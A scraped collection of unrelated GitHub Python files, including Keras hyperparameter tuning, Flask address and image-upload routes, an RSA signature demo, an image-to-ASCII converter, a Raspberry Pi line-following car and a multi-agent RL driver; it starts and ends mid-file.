grid_result.cv_results_['params']\n\n for mean, stdev, param in zip(means, stds, params):\n self.logger.write_info(\"%f (%f) with: %r\" % (mean, stdev, param))\n\n def __get_parameter_switcher(self):\n return {\n AttributeToTuneEnum.BATCH_SIZE_AND_EPOCHS:\n lambda n, size: self.__get_parameters_for_batch_epochs(n, size),\n AttributeToTuneEnum.OPTIMIZATION_ALGORITHMS:\n lambda n, size: self.__get_parameters_for_optimization_algorithm(n, size),\n AttributeToTuneEnum.LEARN_RATE_AND_MOMENTUM:\n lambda n, size: self.__get_parameters_for_learn_rate_and_momentum(n, size),\n AttributeToTuneEnum.NETWORK_WEIGHT_INITIALIZATION:\n lambda n, size: self.__get_parameters_network_weight_init(n, size),\n AttributeToTuneEnum.NEURON_ACTIVATION_FUNCTION:\n lambda n, size: self.__get_parameters_neuron_activation_function(n, size),\n AttributeToTuneEnum.DROPOUT_REGULARIZATION:\n lambda n, size: self.__get_parameters_dropout_regularization(n, size),\n AttributeToTuneEnum.NUMBER_NEURONS:\n lambda n, size: self.__get_parameters_number_neurons(n, size)\n }\n\n\ndef get_default_sequential_model(num_classes, image_size):\n \"\"\"Calculate the best value for the CNN module based on the attribute selected\n\n Parameters\n ----------\n num_classes : number\n Number of different types of classes in the database selected to train the model\n image_size : tuple\n Image shape\n\n Returns\n -------\n Sequential\n The convolutional neural network model to compile and train\n \"\"\"\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='relu',\n input_shape=(image_size[0], image_size[1], 1)))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n return model\n\n\ndef create_model_batch_epochs(num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the batch and epoch hyperparameters\n\n Parameters\n ----------\n num_classes : 
number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = get_default_sequential_model(num_classes, image_size)\n\n # Compile model\n model.compile(optimizer=\"adam\", loss=\"categorical_crossentropy\", metrics=[\"accuracy\"])\n return model\n\n\ndef create_model_optimizer_algorithm(optimizer='adam', num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best value for the optimization algorithm hyperparameter\n\n Parameters\n ----------\n optimizer : string, optional\n Optimizer algorithm value (Default is \"adam\")\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = get_default_sequential_model(num_classes, image_size)\n\n # Compile model\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_learn_rate_and_momentum(learn_rate=0.01, momentum=0, num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the learn rate and momentum hyperparameters\n\n Parameters\n ----------\n learn_rate : string, optional\n Learn rate value (Default is 0.01)\n momentum : number, optional\n Momentum value (Default is 0)\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = get_default_sequential_model(num_classes, image_size)\n\n # Compile model\n optimizer = SGD(learning_rate=learn_rate, momentum=momentum)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_network_weight_init(init_mode='uniform', num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best value for the network weight initialization hyperparameter\n\n Parameters\n ----------\n init_mode : string, optional\n Network weight initialization value (Default is \"uniform\")\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation='relu',\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=init_mode))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, kernel_initializer=init_mode, activation='relu'))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='categorical_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_neuron_activation_function(activation='relu', num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best value 
for the neuron activation function hyperparameter\n\n Parameters\n ----------\n activation : string, optional\n Neuron activation function value (Default is \"relu\")\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation=activation,\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=INIT_MODE))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, kernel_initializer='uniform', activation=activation))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n return model\n\n\ndef create_model_dropout_regularization(dropout_rate=0.0, weight_constraint=0, num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the dropout rate and weight constraint hyperparameters\n\n Parameters\n ----------\n dropout_rate : number, optional\n Dropout rate value (Default is 0.0)\n weight_constraint : number, optional\n Weight constraint value (Default is 0)\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(25, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation=ACTIVATION,\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=INIT_MODE,\n kernel_constraint=max_norm(weight_constraint)))\n model.add(Dropout(dropout_rate))\n model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(100, kernel_initializer='uniform', activation=ACTIVATION))\n model.add(Dropout(dropout_rate))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n return model\n\n\ndef create_model_number_neurons(neurons_conv_layer=25, neurons_dense_layer=100, num_classes=39, image_size=(150, 150)):\n \"\"\"Calculate the best values for the number of neurons of the convolutional and the dense layer\n\n Parameters\n ----------\n neurons_conv_layer : number, optional\n Neurons of the convolutional layer (Default is 25)\n neurons_dense_layer : number, optional\n Neurons of the dense layer (Default is 100)\n num_classes : number, optional\n Number of different types of classes in the database selected to train the model (Default is 39)\n image_size : tuple, optional\n Image shape (Default is (150, 150))\n\n Returns\n -------\n Sequential\n The convolutional neural network model to train\n \"\"\"\n\n # create model\n model = Sequential()\n model.add(Conv2D(neurons_conv_layer, kernel_size=(3, 3), strides=(1, 1), padding='valid', activation=ACTIVATION,\n input_shape=(image_size[0], image_size[1], 1), kernel_initializer=INIT_MODE,\n kernel_constraint=max_norm(WEIGHT_CONSTRAINT)))\n model.add(Dropout(DROPOUT_RATE))\n 
model.add(MaxPool2D(pool_size=(1, 1)))\n model.add(Flatten())\n model.add(Dense(neurons_dense_layer, kernel_initializer='uniform', activation=ACTIVATION))\n model.add(Dropout(DROPOUT_RATE))\n model.add(Dense(num_classes, activation='softmax'))\n\n # Compile model\n optimizer = SGD(learning_rate=LEARN_RATE, momentum=MOMENTUM)\n model.compile(loss='binary_crossentropy', optimizer=optimizer, metrics=['accuracy'])\n\n return model\n","repo_name":"marGaliana/SignLanguageProcessing","sub_path":"SignGestureDetection/Src/Structures/NeuralNetworks/hyperparameterOptimization.py","file_name":"hyperparameterOptimization.py","file_ext":"py","file_size_in_byte":18110,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"11656462983","text":"from flask import Flask, flash, redirect, render_template, request, session, abort, url_for\nfrom flask import Blueprint\nimport datetime\nfrom endpoints.utils import login_required, view, login_required_action\n\nfrom model.address import *\n\naddresses = Blueprint('addresses', __name__, url_prefix='/addresses')\n\n\n@addresses.route(\"/\", methods=[\"GET\"])\n@view\ndef getAddressesEnd(*args, **kwargs):\n address = getAllAddresses()\n if address is None:\n address = []\n return render_template(\"address/address.html\", addresses=address,**kwargs)\n\n\n@addresses.route(\"/\", methods=[\"GET\"])\n@view\ndef getAddressByIdEnd(id, *args, **kwargs):\n address = getAddressById(id)\n if address is None:\n return redirect(url_for(\"user.feed\"))\n else:\n return render_template(\"address/address.html\", addresses=address[0], **kwargs)\n\n\n@addresses.route(\"/create\", methods=[\"GET\", \"POST\"])\n@login_required\n@view\ndef createAddressEnd(*args, **kwargs):\n if request.method == \"GET\":\n return render_template(\"address/createAddress.html\", **kwargs)\n\n street_name = request.form[\"street_name\"]\n building_no = request.form[\"building_no\"]\n apartment_no = request.form[\"apartment_no\"]\n locality_name = request.form[\"locality_name\"]\n city = request.form[\"city\"]\n postcode = request.form[\"postcode\"]\n\n createAddress(street_name, building_no, apartment_no, locality_name, city, postcode)\n return redirect(url_for(\"addresses.getAddressesEnd\"))\n\n\n@addresses.route(\"/delete/\", methods=[\"GET\", \"POST\"])\n@login_required\n@view\ndef deleteAddressByIdEnd(id, *args, **kwargs):\n deleteAddress(id)\n return (url_for(\"addresses.getAddressesEnd\"))\n\n\n@addresses.route(\"/update/\", methods=[\"GET\", \"POST\"])\n@login_required\n@view\ndef updateAddressByIdEnd(id, *args, **kwargs):\n address = getAddressById(id)\n if request.method == \"GET\":\n if address is None:\n redirect(url_for(\"user.feed\"))\n else:\n return render_template(\"address/updateAddress.html\", address=address[0], **kwargs)\n\n street_name = request.form[\"street_name\"]\n building_no = request.form[\"building_no\"]\n apartment_no = request.form[\"apartment_no\"]\n locality_name = request.form[\"locality_name\"]\n city = request.form[\"city\"]\n postcode = request.form[\"postcode\"]\n\n updateAddres(id, street_name, building_no, apartment_no, locality_name, city, postcode)\n\n return redirect(url_for('addresses.getAddressesByIdEnd', id=id))\n","repo_name":"yasarbunyamin/itudatabase","sub_path":"endpoints/address.py","file_name":"address.py","file_ext":"py","file_size_in_byte":2475,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"25881336255","text":"try:\n import 
unittest2 as unittest\nexcept ImportError:\n import unittest\n\nfrom marnadi import Route\nfrom marnadi.route import Routes\n\n\nclass RoutesTestCase(unittest.TestCase):\n\n def test_empty(self):\n routes = []\n self.assertListEqual([], Routes(routes))\n\n def test_single_route(self):\n route = Route('/')\n routes = [route]\n self.assertListEqual([route], Routes(routes))\n\n def test_two_routes(self):\n route = Route('/')\n routes = [route] * 2\n self.assertListEqual([route] * 2, Routes(routes))\n\n def test_sequence_of_routes(self):\n route = Route('/')\n routes = [[route] * 2]\n self.assertListEqual([route] * 2, Routes(routes))\n\n def test_two_sequences_of_routes(self):\n route = Route('/')\n routes = [[route] * 2] * 2\n self.assertListEqual([route] * 4, Routes(routes))\n\n def test_mixed_routes_and_sequences(self):\n route = Route('/')\n routes = [route] * 2 + [[route] * 2] * 2\n self.assertListEqual([route] * 6, Routes(routes))\n","repo_name":"renskiy/marnadi","sub_path":"tests/test_route.py","file_name":"test_route.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"61"} +{"seq_id":"10110600688","text":"import sys, os\r\nimport numpy as np\r\nfrom PIL import Image\r\n\r\n\r\nSIZE_WIDTH = 120\r\nSIZE_HEIGHT = 120\r\n\r\n\r\ndef _check_file_exists(filename):\r\n return os.path.exists(filename)\r\n\r\n\r\nclass Convertor:\r\n def __init__(self, filename):\r\n self.filename = filename\r\n\r\n if not _check_file_exists(self.filename):\r\n raise FileNotFoundError('could not found image named %s' %self.filename)\r\n self.image = Image.open(self.filename)\r\n self._to_shades() # terminal is black and white so converting the image to black and white\r\n\r\n def asarry(self):\r\n return np.asarray(self.image)\r\n \r\n def resize(self, height, width):\r\n self.image.thumbnail((height, width))\r\n\r\n def as_text(self):\r\n data = self.asarry()\r\n\r\n for pline in data:\r\n for pixel in pline:\r\n print(self._get_char_for(pixel), end=\"\")\r\n print()\r\n\r\n def _to_shades(self):\r\n self.image = self.image.convert('L')\r\n\r\n def _get_char_for(self, shade): # return char based on pixel shade\r\n if shade >= 230:\r\n return \"#\"\r\n \r\n if shade >= 200:\r\n return \"&\"\r\n \r\n if shade >= 170:\r\n return \"%\"\r\n \r\n if shade >= 140:\r\n return \"H\"\r\n \r\n if shade >= 100:\r\n return \"J\"\r\n \r\n if shade >= 60:\r\n return \"*\"\r\n \r\n if shade >= 30:\r\n return \"^\"\r\n return '.'\r\n\r\n\r\ndef main(image_name):\r\n converter = Convertor(image_name)\r\n converter.resize(SIZE_HEIGHT, SIZE_WIDTH)\r\n converter.as_text()\r\n\r\nif __name__ == \"__main__\":\r\n if len(sys.argv) == 1:\r\n raise IndexError(\"Missing argument, image name\")\r\n filename = sys.argv[1]\r\n main(filename)\r\n","repo_name":"dsal3389/sandbox","sub_path":"python/image to chars/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"17292214731","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Jun 1 13:05:04 2019\n\n@author: swang\n\"\"\"\nclass sqlthefuk(object):\n \"\"\"\n \n sql helper to simplify the query generating process, which is a super \n painful work to do \n \"\"\"\n def __init__(self):\n self.query = \"\"\n \n def wrapit(self, item):\n # add left and right parenthesis\n return \"(\" + item + \")\"\n \n def select(self, columns, table, nested_mark=''):\n # select multiple 
columns\n        if isinstance(columns, list):\n            if not nested_mark:\n                columns = ', '.join(columns)\n            else:\n                columns = ', '.join([nested_mark + '.' + c for c in columns])\n        \n        # select single column\n        elif isinstance(columns, str):\n            pass\n        \n        # select all columns\n        elif not columns:\n            columns = '*'\n\n        if not nested_mark:\n            return \"select {} from {}\".format(columns, table)\n        else:\n            query = \"select {} from {} {}\".format(columns, table, nested_mark)\n            return self.wrapit(query)","repo_name":"songsong328/my_projects","sub_path":"sql_wrapper.py","file_name":"sql_wrapper.py","file_ext":"py","file_size_in_byte":1092,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"74402162435","text":"import rsa\nimport sys\nimport os\nfrom Cryptodome.Hash import SHA256\n\ndef hash_file(message_file):\n    h = SHA256.new()\n    with open(message_file, \"rb\") as f:\n        while True:\n            buf = f.read(1024)\n            if len(buf) == 0:\n                break\n            h.update(buf)\n\n    #print(\"File hash: \" + str(h.hexdigest()))\n    return h.digest() # return the hash as a byte array\n\n# write the electronic signature to a file\ndef make_signature(message_file, key):\n    \n    # compute the hash of the file\n    h = hash_file(message_file)\n\n    # encrypt the hash with the private key\n    signature = rsa.encrypt(h, key)\n\n    # write the electronic signature to a file\n    signature_file_name = \"signature\"\n    with open(signature_file_name, \"wb\") as f:\n        f.write(signature)\n\n    print(\"The electronic signature has been saved to the file '{0}'\".format(signature_file_name))\n\n    return signature_file_name\n\n# verify the electronic signature\ndef check_signature(message_file, signature_file ,key):\n    # compute the hash of the message file\n    h1 = hash_file(message_file)\n\n    # decrypt the electronic signature\n    signature = None\n    with open(signature_file, \"rb\") as f:\n        signature = f.read()\n\n    try:\n        h2 = rsa.decrypt(signature, key)\n    except rsa.pkcs1.DecryptionError:\n        return False\n\n    return (h1 == h2)\n\ndef main():\n    try:\n        message_file = sys.argv[1]\n    except IndexError:\n        print(\"Specify the message file using command-line arguments\")\n        return\n\n    if not os.path.exists(message_file):\n        print(\"File not found!\")\n        return\n\n    (privkey, pubkey) = rsa.newkeys(2048)\n    signature_file = make_signature(message_file, privkey)\n    filename = input(\"Enter the name of the signature file:\")\n    is_valid = check_signature(message_file, filename, pubkey)\n\n    if is_valid:\n        print(\"The electronic signature is valid.\")\n    else:\n        print(\"The electronic signature is invalid.\")\n    \n\nif __name__ == '__main__':\n    main()\n","repo_name":"Dimama/BMSTU_SEM7","sub_path":"Information Security/Electronic Signature/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2328,"program_lang":"python","lang":"ru","doc_type":"code","stars":2,"dataset":"github-code","pt":"61"} +{"seq_id":"19340224646","text":"import pandas as pd\nimport numpy as np\nimport json\n\n\n\ndef user_case1(data, dic, col_name):\n    \n    for key, arr in dic.items():\n        data = data[data[key].isin(arr)]\n    \n    value_counts = data[col_name].value_counts()\n    \n    ret1 = dict(zip(value_counts.index, value_counts.values))\n    ret2 = dict(zip(value_counts.index, value_counts.values/len(data.index)))\n\n    return ret1, ret2\n\n\n\n\ndef convert(o):\n    if isinstance(o, np.int64): \n    	return int(o) \n    raise TypeError\n\n\ndef pieChart(dict, col, index):\n    data = pd.read_csv(index)\n    count, proportion = user_case1(data, dict,col)\n    return json.dumps(count, 
default=convert)\n\n","repo_name":"Wutever/cs412_data_mining","sub_path":"user_case1.py","file_name":"user_case1.py","file_ext":"py","file_size_in_byte":656,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"61"} +{"seq_id":"23446571581","text":"infile = \"a-large.in\"\r\noutfile = \"a-large.out\"\r\n\r\nlines = [l.strip() for l in open(infile,\"r\")]\r\nfrom collections import defaultdict, Counter\r\nfrom functools import partial\r\n\r\nnum_cases = int(lines[0])\r\nlines = lines[1:]\r\n\r\ncases = []\r\n\r\nfor _ in range(num_cases):\r\n \r\n N, X = map(int, lines[0].split())\r\n lines = lines[1:]\r\n sizes = map(int, lines[0].split())\r\n lines = lines[1:]\r\n \r\n case = N, X, sizes\r\n \r\n cases.append(case)\r\n \r\ndef process_case(case):\r\n \r\n n, x, sizes = case\r\n \r\n sizes.sort(reverse=True)\r\n #print n, x, sizes\r\n\r\n \r\n count = 0\r\n while True:\r\n if len(sizes) == 0:\r\n return count\r\n smallest = sizes.pop()\r\n #print smallest, sizes, count\r\n for i, size in enumerate(sizes):\r\n #print \"checking\", i, size\r\n if size + smallest <= x:\r\n matched = True\r\n sizes.pop(i)\r\n break\r\n \r\n count += 1\r\n\r\n return count\r\n \r\n \r\n return case\r\n\r\nwith open(outfile,\"w\") as g:\r\n \r\n for i, case in enumerate(cases):\r\n g.write(\"Case #\" + str(i + 1) + \": \" + str(process_case(case)) + \"\\n\")\r\n \r\n\r\n","repo_name":"dr-dos-ok/Code_Jam_Webscraper","sub_path":"solutions_python/Problem_148/166.py","file_name":"166.py","file_ext":"py","file_size_in_byte":1192,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"37452597150","text":"#!/usr/bin/python\n#coding=utf-8\nimport numpy\nimport cv2\nimport time\n\nfrom pid_controller import PID_Controller\nfrom driver import driver\nfrom line_detection import line_detection\nfrom cross_detect import detect_crossing\nfrom sign_detect import sign_detection\nfrom mser_detect import *\nfrom is_block import *\nfrom color_mark_detection import *\nCROSS_FLAGS = [2, 4]\n\n# move\nSTRAIGHT = (4,4)\nRIGHT_INPLACE = (-20, 20)\nLEFT_INPLACE = (20, -20)\n\nif __name__ == '__main__':\n # initialize video capture\n cap1 = cv2.VideoCapture(0)\n time1 = time.time()\n frame_cnt = 0\n fps = cap1.get(cv2.CAP_PROP_FPS)\n\n # objects\n controller = PID_Controller(0.02,0,0,-3,3)\n car = driver()\n cross_count = 0\n while True:\n _, frame1 = cap1.read()\n frame_cnt += 1\n ## if delay exceeds one frame, read until we get the newest frame\n #time2 = time.time()\n #delays = (time2-time1)*fps - frame_cnt\n #print(\"delays: {}\".format(delays))\n #while delays > 0:\n # _,frame1 = cap1.read()\n # frame_cnt += 1\n # time2 = time.time()\n # delays = (time2-time1)*fps - frame_cnt\n if frame_cnt % 30 == 29:\n print(\"Rest camera\")\n cap1.release()\n cap1 = cv2.VideoCapture(0)\n _, frame1 = cap1.read()\n \n # crossing detection\n if detect_crossing(img = frame1):\n cross_count += 1\n if 1 or cross_count in CROSS_FLAGS:\n # start turning right\n for i in range(40): \n car.set_speed(40, 40)\n _, frame1 = cap1.read()\n for i in range(60): \n car.set_speed(RIGHT_INPLACE[0], RIGHT_INPLACE[1])\n _, frame1 = cap1.read()\n continue\n # sign detection\n \n if (detect_block_color(frame1)):\n \n car.set_speed(0,0)\n cv2.imwrite('img_block/color_{}.png'.format(int(time.time())%100000), frame1)\n img,info=mser_image_processing(frame1)\n print(info)\n print(\"Rest camera\")\n cap1.release()\n cap1 = cv2.VideoCapture(0)\n _, frame1 = cap1.read()\n \n \n # if 
sign == ...:\n        #     ...\n        #     continue\n        # elif sign == ...:\n        #     ...\n        #     continue\n        # lane keep\n        error = line_detection(frame1)\n        # print('err = ',error)\n        dv = controller.get_output(error)\n        # print('dv = ', dv)\n        car.set_speed((4-dv)*10, (4+dv)*10)\n\n","repo_name":"BPsoda/AU3506_raspberry_pi_car","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"15879386319","text":"import unittest\n\nfrom view_layer_common import *\n\n\n# ############################################################\n# Testing\n# ############################################################\n\nclass UnitTesting(ViewLayerTesting):\n    def test_view_layer_syncing(self):\n        \"\"\"\n        See if we can copy view layers.\n        \"\"\"\n        import bpy\n        scene = bpy.context.scene\n        view_layer = scene.view_layers.new(\"All\")\n\n        self.assertEqual(len(view_layer.collections), 1)\n        self.assertEqual(view_layer.collections[0].collection, scene.master_collection)\n\n        self.assertEqual(\n            {collection.name for collection in view_layer.collections[0].collections},\n            {'Collection 1'})\n\n        self.assertEqual(\n            bpy.ops.outliner.collection_new(),\n            {'FINISHED'})\n\n        self.assertEqual(\n            {collection.name for collection in view_layer.collections[0].collections},\n            {'Collection 1', 'Collection 2'})\n\n\n# ############################################################\n# Main - Same For All Render Layer Tests\n# ############################################################\n\nif __name__ == '__main__':\n    UnitTesting._extra_arguments = setup_extra_arguments(__file__)\n    unittest.main()\n","repo_name":"blender/blender","sub_path":"tests/python/view_layer/test_collection_new_sync.py","file_name":"test_collection_new_sync.py","file_ext":"py","file_size_in_byte":1265,"program_lang":"python","lang":"de","doc_type":"code","stars":10105,"dataset":"github-code","pt":"61"} +{"seq_id":"36548722241","text":"from flask import redirect, render_template, render_template_string, Blueprint\nfrom flask import request, url_for, flash\nfrom flask_user import current_user, login_required, roles_accepted\nfrom app.init_app import app, db\nfrom app.models import UserProfileForm\n\n# The Home page is accessible to anyone\n@app.route('/')\ndef home_page():\n    return render_template('test/test.html')\n\n\n# The User page is accessible to authenticated users (users that have logged in)\n@app.route('/user')\n@login_required # Limits access to authenticated users\ndef user_page():\n    return render_template('pages/user_page.html')\n\n\n# The Admin page is accessible to users with the 'admin' role\n@app.route('/admin')\n@roles_accepted('admin') # Limits access to users with the 'admin' role\ndef admin_page():\n    return render_template('pages/admin_page.html')\n\n\n@app.route('/pages/profile', methods=['GET', 'POST'])\n@login_required\ndef user_profile_page():\n    # Initialize form\n    form = UserProfileForm(request.form, current_user)\n\n    # Process valid POST\n    if request.method == 'POST' and form.validate():\n        # Copy form fields to user_profile fields\n        form.populate_obj(current_user)\n\n        # Save user_profile\n        db.session.commit()\n\n        # Redirect to home page\n        return redirect(url_for('home_page'))\n\n    # Process GET or invalid POST\n    return render_template('pages/user_profile_page.html',\n                           form=form)\n\n\nUPLOAD_FOLDER = '/home/himanshu/SIH/web/images'\n# from PIL import Image\n# from io import BytesIO\n# import base64\nimport json\nimport time\nimport
 base64\n@app.route('/test1', methods=['GET', 'POST'])\ndef test():\n    try:\n        a = request.form\n        filename = str(int(time.time())) + '.png'\n        filepath = UPLOAD_FOLDER + '/' + filename\n        img_data = a['img_data'].split(',')[1]\n\n        with open(filepath, \"wb\") as fh:\n            fh.write(base64.b64decode(img_data))\n        return json.dumps({\"success\": True})\n    except: \n        return json.dumps({\"success\": False})\n\n\nALLOWED_EXTENSIONS = set(['png', 'jpg', 'jpeg'])\napp.config['UPLOAD_FOLDER'] = UPLOAD_FOLDER\n\nfrom flask import send_from_directory\nimport os\nfrom werkzeug.utils import secure_filename\n\ndef allowed_file(filename):\n    return '.' in filename and \\\n           filename.rsplit('.', 1)[1].lower() in ALLOWED_EXTENSIONS\n\n@app.route('/uploads/')\ndef uploaded_file(filename):\n    return send_from_directory(app.config['UPLOAD_FOLDER'], filename)\n\n@app.route('/test', methods=['GET', 'POST'])\ndef upload_file():\n    if request.method == 'POST':\n        if 'file' not in request.files:\n            flash('No file part')\n            return redirect(request.url)\n        file = request.files['file']\n        # if the user does not select a file, the browser also\n        # submits an empty part without a filename\n        if file.filename == '':\n            flash('No selected file')\n            return redirect(request.url)\n        if file and allowed_file(file.filename):\n            filename = secure_filename(file.filename)\n            file.save(os.path.join(app.config['UPLOAD_FOLDER'], filename))\n            # return redirect(url_for('uploaded_file', filename=filename))\n            return render_template_string('uploaded')\n    return render_template('test/test.html')","repo_name":"mohit4/dermaScan","sub_path":"app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":3288,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"31829969906","text":"'''\n@Author: Pavan Nakate\n@Date: 2021-11-12 10:32\n@Last Modified by: Pavan Nakate\n@Last Modified time: None\n@Title : DifferentDataTypeTuple \n'''\ndef different_datatype():\n    \"\"\"\n    Description:\n        This function creates a tuple with different data-types and prints it\n    Parameter:\n        None\n    Return:\n        None\n    \"\"\"\n    try:\n        # different data-type Tuple \n        type_tuple = (1,2.3,'A',\"Hello\",True)\n        print(\"Tuple with different data-type : \",type_tuple)\n        \n    except Exception as e:\n        print(e)\n\nif __name__ == \"__main__\":\n    different_datatype()\n","repo_name":"Pavan699/Data-Structures","sub_path":"Tuples/DifferentDataTypeTuple.py","file_name":"DifferentDataTypeTuple.py","file_ext":"py","file_size_in_byte":594,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"61"} +{"seq_id":"14430364025","text":"import numpy as np\nimport torch\n\ndef _t2n(x):\n    return x.detach().cpu().numpy()\n\nclass Driver(object):\n    def __init__(self, config, client=None):\n\n        self.all_args = config['all_args']\n        self.envs = config['envs']\n        self.eval_envs = config['eval_envs']\n        self.device = config['device']\n        self.num_agents = config['num_agents']\n        if 'signal' in config:\n            self.actor_id = config['signal'].actor_id\n            self.weight_ids = config['signal'].weight_ids\n        else:\n            self.actor_id = 0\n            self.weight_ids = [0]\n\n        # parameters\n        self.env_name = self.all_args.env_name\n        self.algorithm_name = self.all_args.algorithm_name\n        self.experiment_name = self.all_args.experiment_name\n        self.use_centralized_V = self.all_args.use_centralized_V\n        self.use_obs_instead_of_state = self.all_args.use_obs_instead_of_state\n        self.num_env_steps = self.all_args.num_env_steps if hasattr(self.all_args,'num_env_steps') else
 self.all_args.eval_num\n\n        self.episode_length = self.all_args.episode_length\n        self.n_rollout_threads = self.all_args.n_rollout_threads\n        self.learner_n_rollout_threads = self.all_args.n_rollout_threads\n\n        self.n_eval_rollout_threads = self.all_args.n_eval_rollout_threads\n        self.hidden_size = self.all_args.hidden_size\n        self.recurrent_N = self.all_args.recurrent_N\n\n        # interval\n        self.save_interval = self.all_args.save_interval\n        self.use_eval = self.all_args.use_eval\n        self.eval_interval = self.all_args.eval_interval\n        self.log_interval = self.all_args.log_interval\n\n        # dir\n        self.model_dir = self.all_args.model_dir\n\n\n\n        if self.algorithm_name == \"rmappo\":\n            from tmarl.algorithms.r_mappo_distributed.mappo_algorithm import MAPPOAlgorithm as TrainAlgo\n            from tmarl.algorithms.r_mappo_distributed.mappo_module import MAPPOModule as AlgoModule\n        else:\n            raise NotImplementedError\n\n        if self.envs:\n            share_observation_space = self.envs.share_observation_space[0] \\\n                if self.use_centralized_V else self.envs.observation_space[0]\n            # policy network\n            self.algo_module = AlgoModule(self.all_args,\n                                          self.envs.observation_space[0],\n                                          share_observation_space,\n                                          self.envs.action_space[0],\n                                          device=self.device)\n\n        else:\n            share_observation_space = self.eval_envs.share_observation_space[0] \\\n                if self.use_centralized_V else self.eval_envs.observation_space[0]\n            # policy network\n            self.algo_module = AlgoModule(self.all_args,\n                                          self.eval_envs.observation_space[0],\n                                          share_observation_space,\n                                          self.eval_envs.action_space[0],\n                                          device=self.device)\n\n        if self.model_dir is not None:\n            self.restore()\n\n        # algorithm\n        self.trainer = TrainAlgo(self.all_args, self.algo_module, device=self.device)\n\n\n        # buffer\n        from tmarl.replay_buffers.normal.shared_buffer import SharedReplayBuffer\n\n        self.buffer = SharedReplayBuffer(self.all_args,\n                                         self.num_agents,\n                                         self.envs.observation_space[0] if self.envs else self.eval_envs.observation_space[0],\n                                         share_observation_space,\n                                         self.envs.action_space[0] if self.envs else self.eval_envs.action_space[0])\n\n    def run(self):\n        raise NotImplementedError\n\n    def warmup(self):\n        raise NotImplementedError\n\n    def collect(self, step):\n        raise NotImplementedError\n\n    def insert(self, data):\n        raise NotImplementedError\n\n    def restore(self):\n        